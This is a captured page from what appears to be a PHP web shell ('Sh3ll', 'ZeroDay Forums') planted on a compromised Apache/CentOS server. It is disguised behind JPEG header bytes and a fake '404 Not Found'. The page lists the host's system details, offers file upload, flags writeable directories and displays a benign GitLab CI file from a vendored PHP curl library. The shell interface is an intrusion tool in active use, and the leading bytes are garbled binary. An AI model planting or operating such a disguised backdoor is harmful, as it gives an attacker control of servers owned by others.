����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/st2/vendor/curl/curl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/st2/vendor/curl/curl/.gitlab-ci.yml
stages:
    - build
    - test

build-test-server:
    image: docker:latest
    stage: build
    services:
        - docker:dind
    script:
        - docker login -u "$CI_REGISTRY_USER" -p "$CI_REGISTRY_PASSWORD" $CI_REGISTRY
        - docker build --pull -t "$CI_REGISTRY_IMAGE:server-test" tests/server
        - docker push "$CI_REGISTRY_IMAGE:server-test"
    only:
        changes:
            - tests/server

tests-php5.6:
    image: alpine:3.7
    stage: test
    services:
        - name: "$CI_REGISTRY_IMAGE:server-test"
          alias: server_test
    script:
        - apk add --no-cache php5-cli php5-curl php5-gd php5-phar php5-json php5-openssl php5-dom php5-xml php5-zlib
        - ln -s /usr/bin/php5 /usr/bin/php
        - php --version
        - if [ ! -f composer.phar ]; then DOWLOAD_COMPOSER=1 ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php -r "if (hash_file('sha384', 'composer-setup.php') === '93b54496392c062774670ac18b134c3b3a95e5a5e5c8f1a9f115f203b75bf9a129d5daa8ba6a13e2cc8a1da0806388a8') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;" ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php composer-setup.php ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php -r "unlink('composer-setup.php');" ; fi;
        - php composer.phar install
        - vendor/bin/phpcs --warning-severity=0 --standard=PSR2 src
        - vendor/bin/phpunit
    cache:
        key: php5.6
        paths:
            - composer.phar
            - vendor

tests-php7.0:
    image: alpine:3.5
    stage: test
    services:
        - name: "$CI_REGISTRY_IMAGE:server-test"
          alias: server_test
    script:
        - apk add --no-cache php7 php7-curl php7-gd php7-phar php7-json php7-openssl php7-dom php7-mbstring
        - ln -s /usr/bin/php7 /usr/bin/php
        - php --version
        - if [ ! -f composer.phar ]; then DOWLOAD_COMPOSER=1 ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php -r "if (hash_file('sha384', 'composer-setup.php') === '93b54496392c062774670ac18b134c3b3a95e5a5e5c8f1a9f115f203b75bf9a129d5daa8ba6a13e2cc8a1da0806388a8') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;" ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php composer-setup.php ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php -r "unlink('composer-setup.php');" ; fi;
        - php composer.phar install
        - vendor/bin/phpcs --warning-severity=0 --standard=PSR2 src
        - nohup php -S localhost:8000 -t tests/server/php-curl-test > phpd.log 2>&1 &
        - vendor/bin/phpunit
    cache:
        key: php7.0
        paths:
            - composer.phar
            - vendor

tests-php7.1:
    image: alpine:3.7
    stage: test
    services:
        - name: "$CI_REGISTRY_IMAGE:server-test"
          alias: server_test
    script:
        - apk add --no-cache php7-cli php7-curl php7-gd php7-phar php7-json php7-openssl php7-dom php7-simplexml php7-tokenizer php7-mbstring php7-xml
        - php --version
        - if [ ! -f composer.phar ]; then DOWLOAD_COMPOSER=1 ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php -r "if (hash_file('sha384', 'composer-setup.php') === '93b54496392c062774670ac18b134c3b3a95e5a5e5c8f1a9f115f203b75bf9a129d5daa8ba6a13e2cc8a1da0806388a8') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;" ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php composer-setup.php ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php -r "unlink('composer-setup.php');" ; fi;
        - php composer.phar install
        - vendor/bin/phpcs --warning-severity=0 --standard=PSR2 src
        - nohup php -S localhost:8000 -t tests/server/php-curl-test > phpd.log 2>&1 &
        - vendor/bin/phpunit
    cache:
        key: php7.1
        paths:
            - composer.phar
            - vendor

tests-php7.2:
    image: alpine:3.8
    stage: test
    services:
        - name: "$CI_REGISTRY_IMAGE:server-test"
          alias: server_test
    script:
        - apk add --no-cache php7-cli php7-curl php7-gd php7-phar php7-json php7-openssl php7-dom php7-simplexml php7-tokenizer php7-mbstring php7-xml
        - php --version
        - if [ ! -f composer.phar ]; then DOWLOAD_COMPOSER=1 ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php -r "if (hash_file('sha384', 'composer-setup.php') === '93b54496392c062774670ac18b134c3b3a95e5a5e5c8f1a9f115f203b75bf9a129d5daa8ba6a13e2cc8a1da0806388a8') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;" ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php composer-setup.php ; fi;
        - if [ -n "$DOWLOAD_COMPOSER" ] ; then php -r "unlink('composer-setup.php');" ; fi;
        - php composer.phar install
        - vendor/bin/phpcs --warning-severity=0 --standard=PSR2 src
        - nohup php -S localhost:8000 -t tests/server/php-curl-test > phpd.log 2>&1 &
        - vendor/bin/phpunit
    cache:
        key: php7.2
        paths:
            - composer.phar
            - vendor

ZeroDay Forums Mini